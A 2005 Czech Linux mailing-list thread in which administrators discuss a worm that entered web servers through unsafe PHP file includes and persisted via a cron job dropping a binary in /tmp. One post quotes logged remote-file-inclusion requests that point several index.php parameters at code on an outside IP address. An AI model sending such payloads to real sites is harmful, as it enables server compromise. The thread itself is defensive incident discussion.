Proces exe beziaci pod apachom
Zdenek Lukes
zlukes na eeg-cz.com
Středa Prosinec 28 23:28:32 CET 2005
Jinak taky jsem bojoval v exe procesem, ale jako vzdy se tam dostal pres
nezabezpecene klientovi inludy v PHP kodu
(neni na to si includovat soubory pres promenou, takove koko..... bych
vrazdil)
viz URL:
GET /index.php?switch=http://219.133.46.212/admin/html/bar?
GET
/index.php?switch=http://219.133.46.212/admin/html/bar?&id=http://219.133.46.212/admin/html/bar?&x=http://219.133.46.212/admin/html/bar?&trideni=http://219.133.46.212/admin/html/bar?
Lukin
----- Original Message -----
From: <Jan.Houstek na mff.cuni.cz>
To: <linux na linux.cz>
Sent: Wednesday, December 28, 2005 9:47 PM
Subject: Re: Proces exe beziaci pod apachom
> On Wed, 28 Dec 2005, Zdenek Mazanec wrote:
>>> Je to nejake svinstvo (rozumej cerv), kteremu se zrovna ted nejak
>>> dari. U jednoho zakaznika jsem to videl -- dostal se tam pres
>>> nejaka derava php a vytvoril si cronovou ulohu, ktera vyrobi
>>> prislusnou binarku kdesi v /tmp, spusti ji a smaze (a diky tomu, ze
>>> to je v cronu, to po zabiti po chvili skodi znovu).
>>>
>>> Samotny program se choval dost agresivne, nemel jsem prilezitost
>>> prozkoumat, co presne je obsahem komunikace, ale u toho zakaznika
>>> se mu podarilo zatizit Cisco 3600 zpusobem, ze bylo totalne tuhe.
>>>
>> To mate z toho, ze nemate php apache zavrenyho v chrootu a dokonce mu
>> povolujete vytvaret cron ulohy.
>
> To z toho ma ten zakaznik :) Ja jsem u nej byl jen resit pruser, nikdy
> predtim jsem ten stroj nevidel. Jinak by to ale moc platne nebylo, i v tom
> chrootu se typicky nejaky ten adresar, kam apache muze zapisovat, najde, a
> to vetsinou bohate staci.
>
> Nemoznost pouziti cronu je jen slabou utechou, kdyz se tam nekdo muze
> dostat jednou, dostane se tam i znovu a cronem si to pojistovat
> nepotrebuje.
>
> Pomerne ucinne je zakazani potencialne nebezpecnych funkci, zejmena
> spousteni externich programu, ale zakladem je mit ty aplikace napsane
> bezpecne -- pokud tomu tak neni, restriktivni konfiguraci serveru se to
> dohani blbe.
>
>> Fasnuje me, co vsechno admistratori jsou ochotni pod tlakem zakaznika
>> povolit na sdilenych strojich.
>
> Oni vetsinou bohuzel nepotrebuji ani ten tlak ...
>
> -- Honza Houstek
Další informace o konferenci Linux